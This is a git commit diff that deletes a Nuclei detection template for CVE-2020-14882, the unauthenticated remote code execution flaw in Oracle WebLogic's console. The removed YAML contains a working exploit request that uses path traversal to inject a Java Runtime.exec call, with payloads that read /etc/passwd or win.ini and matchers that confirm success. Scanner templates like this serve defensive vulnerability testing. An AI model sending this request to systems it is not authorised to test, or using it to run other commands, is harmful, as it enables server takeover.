moved to another branch for the fix.
bauthard
parent
278982a441
commit
73c94b174c
|
|
@ -1,41 +0,0 @@
|
||||||
id: cve-2020-14882
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Oracle WebLogic Server Unauthenticated RCE
|
|
||||||
author: dwisiswant0
|
|
||||||
severity: critical
|
|
||||||
description: |
|
|
||||||
Vulnerability in the Oracle WebLogic Server
|
|
||||||
product of Oracle Fusion Middleware (component: Console).
|
|
||||||
Supported versions that are affected are 10.3.6.0.0,
|
|
||||||
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
|
|
||||||
Easily exploitable vulnerability allows unauthenticated
|
|
||||||
attacker with network access via HTTP to compromise the server.
|
|
||||||
Successful attacks of this vulnerability can result in takeover.
|
|
||||||
|
|
||||||
# References:
|
|
||||||
# - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
|
||||||
# - https://twitter.com/jas502n/status/1321416053050667009
|
|
||||||
# - https://youtu.be/JFVDOIL0YtA
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- payloads:
|
|
||||||
command:
|
|
||||||
- "cat%20%2Fetc%2Fpasswd"
|
|
||||||
- "type%20C%3A%5CWindows%5Cwin.ini"
|
|
||||||
raw:
|
|
||||||
- |
|
|
||||||
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
|
||||||
|
|
||||||
_nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{{'command'}}%27);%22)
|
|
||||||
matchers:
|
|
||||||
- type: regex
|
|
||||||
regex:
|
|
||||||
- "root:[x*]:0:0:"
|
|
||||||
- "\\[(font|extension|file)s\\]"
|
|
||||||
- "=UnexpectedExceptionPage"
|
|
||||||
condition: or
|
|
||||||
part: body
|
|
||||||
Loading…
Reference in New Issue